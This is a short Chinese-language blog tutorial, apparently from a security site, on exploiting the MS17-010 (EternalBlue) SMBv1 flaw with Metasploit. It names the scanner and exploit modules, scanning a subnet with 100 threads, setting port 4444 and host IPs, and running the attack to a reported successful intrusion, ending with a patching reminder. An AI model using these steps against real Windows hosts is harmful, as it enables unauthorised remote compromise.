MSF下利用MS17-010漏洞入侵

华盟原创文章投稿奖励计划

MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。

MSF下利用MS17-010漏洞入侵

搜索到了 4 个相关的插件:

1. auxiliary/admin/smb/ms17_010_command

2. auxiliary/scanner/smb/smb_ms17_010

3. exploit/windows/smb/ms17_010_eternalblue

4. exploit/windows/smb/ms17_010_psexec

加载

auxiliary/scanner/smb/smb_ms17_010  

扫描可能含有 ms17-010 漏洞的服务器 模块并show options查看参数信息

MSF下利用MS17-010漏洞入侵

扫描目标网段,设置扫描线程,插件默认是1,这里设置为100,发现存在漏洞的主机(这里我们以红箭头为目标主机)

MSF下利用MS17-010漏洞入侵

加载

use exploit/windows/smb/ms17_010_eternalblue 

模块,设置监听端口为4444,设置目标主机ip和本机ip后exploit 攻击

MSF下利用MS17-010漏洞入侵

入侵成功!

MSF下利用MS17-010漏洞入侵

MS17-010是微软在2017年发现的第十个漏洞,俗称“永恒之蓝”,主要针对win7系统。为此,建议大家升级系统或及时打上补丁以免造成不必要的损失。


注:本实验仅供学习交流请勿用于非法用途

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/229227.html

发表评论